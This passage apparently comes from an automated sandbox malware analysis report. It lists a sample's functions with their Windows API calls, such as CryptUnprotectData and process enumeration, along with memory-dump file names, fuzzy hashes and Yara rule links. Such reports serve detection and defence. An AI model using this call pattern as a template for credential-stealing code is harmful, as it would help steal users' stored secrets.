                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: cf0e404767628319db80626502030293b0c43f804bb64d6157d6f8f0b37d4a81
                  • Instruction ID: 767785d0e1eda14b98a61edf273378b26ccda1064a22e968ad67301af1179cc1
                  • Opcode Fuzzy Hash: cf0e404767628319db80626502030293b0c43f804bb64d6157d6f8f0b37d4a81
                  • Instruction Fuzzy Hash: FB21EAB5D04209ABCF04EFE4D9459EEB7B9BF48304F04852AE41AA3250EB345605CBA6
                  Function 00137240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0013724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00137254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00137281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001372A4
                  • LocalFree.KERNEL32(?), ref: 001372AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 874bdbe60964e74f24fabe06fc09ca9748c42ed17067540106152a1dc5c8a91e
                  • Instruction ID: 80c2cfd40707ac921a03ff836e57cbd9d89d2b775259a5b6f81ceee44fbcf8da
                  • Opcode Fuzzy Hash: 874bdbe60964e74f24fabe06fc09ca9748c42ed17067540106152a1dc5c8a91e
                  • Instruction Fuzzy Hash: D00112B5A40208BBDB24DFD4CD46F9E77B8EB44701F104154FB09BB2C0D770AA408B66
                  Function 00149600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014961E
                  • Process32First.KERNEL32(00150ACA,00000128), ref: 00149632
                  • Process32Next.KERNEL32(00150ACA,00000128), ref: 00149647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0014965C
                  • CloseHandle.KERNEL32(00150ACA), ref: 0014967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: f470f600a42445506356a78deaa1162d831648480a234a795ce079f9d5013144
                  • Instruction ID: 07b37e88cfbdde308f38bad80bc86e0f114e6550a91b7eff0b30698465b1e7f9
                  • Opcode Fuzzy Hash: f470f600a42445506356a78deaa1162d831648480a234a795ce079f9d5013144
                  • Instruction Fuzzy Hash: 51011EB5A00208EBCB25DFA5CD48BEEBBF8EB48301F104188A90997250E7349B80DF51
                  Function 005016EC Relevance: 6.7, Strings: 4, Instructions: 1655COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )_yt$]'h>${0x$|-~~
                  • API String ID: 0-2904451045
                  • Opcode ID: 2524993758ab51ebc0ea284ba2173aaee18a74004f825c1cb5c2270dc8102bcf
                  • Instruction ID: 6f218af74a26bc119c8785b80f6f8a11085c961c468ae867fa922150e7545e1b
                  • Opcode Fuzzy Hash: 2524993758ab51ebc0ea284ba2173aaee18a74004f825c1cb5c2270dc8102bcf
                  • Instruction Fuzzy Hash: 25B23CF360C6009FE304AE2DEC8567ABBD9EFD4720F1A863DE6C4C7744E93598058696
                  Function 00148EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00135184,40000001,00000000,00000000,?,00135184), ref: 00148EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 2c983453dd68b9ca37f3978dc421653fef1ccf094ab8be637625d6d6b0fd35e0
                  • Instruction ID: 9ae73ad2a44a95f60beefecdddcf0db4e93fb0b1b038b687985484d48a8c959f
                  • Opcode Fuzzy Hash: 2c983453dd68b9ca37f3978dc421653fef1ccf094ab8be637625d6d6b0fd35e0
                  • Instruction Fuzzy Hash: B9111574200209BFDB04CF64E884FAF37AAAF89704F109448F9198B260DB76EC85DB61
                  Function 00139AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                  • LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 09f5f9565fdc553a2d9df76d7ad465405708e9ec1c150015525e7415c133f356
                  • Instruction ID: ca07a5014826e098ac620af55ef143153149f8f0513cb20927bccc1788c57cd6
                  • Opcode Fuzzy Hash: 09f5f9565fdc553a2d9df76d7ad465405708e9ec1c150015525e7415c133f356
                  • Instruction Fuzzy Hash: F511A4B4240208FFEB11CF64DC95FAAB7B9FB89700F208058F9199B394C7B5A941CB51
                  Function 00147A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0102DCC8,00000000,?,00150E10,00000000,?,00000000,00000000), ref: 00147A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0102DCC8,00000000,?,00150E10,00000000,?,00000000,00000000,?), ref: 00147A7D
                  • wsprintfA.USER32 ref: 00147AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 9e4db54a4da47cb4f7e5ff967a33c80a51195a508483beb627b66c6d281b2ba7
                  • Instruction ID: e62935ed9ebf3c28fe2aace8d0a697b9d6f5be5f408f1c394e113f9ce2862eab
                  • Opcode Fuzzy Hash: 9e4db54a4da47cb4f7e5ff967a33c80a51195a508483beb627b66c6d281b2ba7
                  • Instruction Fuzzy Hash: B7118EB1A45618EBEB208B54DC49FA9BBB8FB44721F10479AE91A932D0C7741A80CF52
                  Function 00509CB0 Relevance: 5.4, Strings: 3, Instructions: 1650COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +i$7!F$o$r^
                  • API String ID: 0-1303766068
                  • Opcode ID: 228a48fa471ec250279deeea61258b324492e08e7437eb333ef7c3e105219ffb
                  • Instruction ID: 5625795f4b0957e5429097a7c36302beab9f8acb5b5bfd110c5beeb1aed79013
                  • Opcode Fuzzy Hash: 228a48fa471ec250279deeea61258b324492e08e7437eb333ef7c3e105219ffb
                  • Instruction Fuzzy Hash: 2AB21AF3A0C2049FE304AE2DDC8567AB7E5EF94720F1A893DE6C5C3744EA3598058697
                  Function 004FA96E Relevance: 5.4, Strings: 3, Instructions: 1632COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: A;n$1)og$X5~;
                  • API String ID: 0-2445990043
                  • Opcode ID: 5866169a08fd074e6d0f920c5df5bb8da28c5ec83252ae367b2efdf6ae3d8a33
                  • Instruction ID: c73afe2300bbb010d2a25d7a00eba8b136312ac352d591e010073c426ef89c95
                  • Opcode Fuzzy Hash: 5866169a08fd074e6d0f920c5df5bb8da28c5ec83252ae367b2efdf6ae3d8a33
                  • Instruction Fuzzy Hash: FAB208F35082049FE704AE2DEC8567AFBE9EF94720F16893DEAC4C7744EA3558048796
                  Function 004FC530 Relevance: 5.4, Strings: 3, Instructions: 1632COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Dj/~$HU[$Q)[
                  • API String ID: 0-3589919254
                  • Opcode ID: eb72abbdad8ce6ff5b74ecfadd0166488a1cf7375b8f1382d3b71e205d6a58a8
                  • Instruction ID: e827467afa84100df2adc28aa8521f22e4cdd19f6e540b10081901e820d2d5b8
                  • Opcode Fuzzy Hash: eb72abbdad8ce6ff5b74ecfadd0166488a1cf7375b8f1382d3b71e205d6a58a8
                  • Instruction Fuzzy Hash: 9BB216F3908214AFE3046E29EC8567AFBE5EF94760F1A493DEAC4C7744EA3558018787
                  Function 0050502E Relevance: 5.1, Strings: 3, Instructions: 1324COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &*/]$LL$p&{x
                  • API String ID: 0-2891148233
                  • Opcode ID: c5059ae61080932c2ee3afaf2f1036de05e16ff7192519ae15fdd3608d671359
                  • Instruction ID: 0b78bb1f01e3b7f128164c947f29433b94ebb0ea7b21de06788e4ad2093072fb
                  • Opcode Fuzzy Hash: c5059ae61080932c2ee3afaf2f1036de05e16ff7192519ae15fdd3608d671359
                  • Instruction Fuzzy Hash: C892F4F360C2049FE304AE2DEC8567AFBE5EF94720F1A893DE6C487744EA3558148697
                  Function 0050BBCB Relevance: 5.0, Strings: 3, Instructions: 1286COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: J#ko$_gy$s5zY
                  • API String ID: 0-2839027486
                  • Opcode ID: 21dd234971fd1884a0673c92ee037c0d39e9319795d7afc0c6eb95e4f3cdddb0
                  • Instruction ID: f67e3f0ec3ba09fd1e944d9c327a4e6bc5ee88ed46466a156a69748e2e4df455
                  • Opcode Fuzzy Hash: 21dd234971fd1884a0673c92ee037c0d39e9319795d7afc0c6eb95e4f3cdddb0
